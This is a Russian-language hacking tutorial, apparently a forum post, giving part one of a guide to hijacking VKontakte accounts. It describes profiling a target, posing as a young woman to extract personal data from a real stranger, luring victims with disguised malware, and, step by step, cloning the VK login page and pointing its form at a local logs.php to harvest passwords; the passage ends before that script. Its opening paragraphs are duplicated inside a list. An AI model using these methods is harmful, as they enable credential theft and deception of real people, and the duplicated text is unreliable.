Получение доступа к аккаунту социальной сети. Часть первая

31.07.2018

Сегодня мы поговорим о получении доступа к аккаунту из какой-либо социальной сети. Я постараюсь описать все способы. Также мы испытаем их на практике.

То, что сегодня опишу в данной статье - уголовно наказуемо. Поэтому я заранее подготовил несколько аккаунтов для получения к ним доступа. Больше всего внимания в этой статье я уделю социальной инженерии, так как практически все способы построены на ней.

Основные способы взлома.
К таким способам относятся:

  • Сегодня мы поговорим о получении доступа к аккаунту из какой-либо социальной сети. Я постараюсь описать все способы. Также мы испытаем их на практике.

    То, что сегодня опишу в данной статье - уголовно наказуемо. Поэтому я заранее подготовил несколько аккаунтов для получения к ним доступа. Больше всего внимания в этой статье я уделю социальной инженерии, так как практически все способы построены на ней.

    Основные способы взлома.
    К таким способам относятся:
  • Фишинг
  • Подбор пароля(Brute force)
  • MITM (Man In The Middle)
  • Используя малварь

Фишинг - способ основанный на клонировании страницы авторизации какой-либо социальной сети.
Brute Force - подбор пароля с использованием различных баз. Этот способ не всегда эффективен но последнее время часто используем.
Используя малварь. К примеру кейлоггер. Он записывает все введенное с клавиатуры и отправляет злоумышленнику.​Шаг 1. - Сбор информации.
Всегда перед взломом(не обязательно аккаунта) нужно собрать как можно больше информации. Для начала нужно обратить внимание на страницу пользователя. В качестве примера возьмем социальную сеть Вконтакте. Обратите внимание на посты закрепленные на странице у пользователя, на его статус. Также попробуйте разобраться какую музыку любит пользователь, обратите внимание на фотографии пользователя. Из всего этого можно взять много информации. Теперь обратим наш взор на контактную информацию. Советую записывать найденные вами данные. Чаще всего номер либо не указывают, либо пишут не верный. Город тоже важная деталь.

Теперь перейдем к взаимодействию с пользователем. Вот тут мы отработаем наши навыки в социальной инженерии. Создаем страницу в этой социальной сети(в нашем случае вконтакте). Я создал страницу молодой девушки и добавил на страницу много различных фотографий. Раскрутил страницу для меньшей опасности раскрытия. И писал первым попадающимся мне на глаза дабы потренировать свою социальную инженерию.
Вот что из этого вышло:

Мы вошли в доверие человека спустя много дней общения(я не стал проводить над ним эксперименты и дальше так как он и вправду поверил что я девушка). Исходя из переписки я получил много различной информации в числе которой был номер телефона, род деятельности, год рождения и.т.п. Будьте осторожны в социальных сетях. А на этом первый шаг закончен.

Шаг 2. - Выбор способа.
Здесь все зависит от того как вы вошли в доверие. И еще, не важно какой способ вы выберете первым. Если не сработает один способ можно попробовать другой. Повторяюсь, все зависит от того как вы вошли в доверие.

Представим что я узнал только то, что человек любит смотреть сериал Сверхестественное. В этом случае я могу первым выбрать фишинг или отослать ему малварь. Под предлогом "Смотри! Серия которой еще нет в эфире". Человек скачивает , открывает(правда придется помучится с форматами файла и обходом av) думает что все нормально. Но при следующем его заходе в социальную сеть данные отправляются нам.

Если же вы плохо вошли в доверие, но сумели собрать достаточно информации, то можно изначально подобрать пароль. Основываясь на полученной информации можно составить много паролей. Правда перед этим советую поискать по базам со стандартными(часто используемыми) паролями.

Шаг 3. - Осуществление способа.

Фишинг.
Это способ является самым популярным. Но я внес некоторые свои изменения и упрощения. Давайте создадим фишинговый сайт по подобию все того же вконтакте. В добавок хотел бы сказать что фишинг уже не является эффективным способом. Но для общего понимания мы его разберем.
1. Переходим на страницу авторизации --> пкм --> сохранить как --> test_fish.

Получили папку и один файл

2. Теперь при помощи текстового редактора откроем файл test_fish.

Первым же делом ищем

<form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login" target="quick_login_frame">

И меняем его на

<form method="POST" name="login" id="quick_login_form" action="./logs.php" target="quick_login_frame">

Теперь ищем строку 215 - 219( js код)
Над ней пишем

<!--

Далее ищем строку закрывающую тело тега script.
И после этой строки снова пишем

-->

Тем самым мы за комментировали js код который нам не пригодится и может вызвать торможение в работе. Осталось сохранить этот файл.

Первоисточник: https://dark-time.life/threads/24148/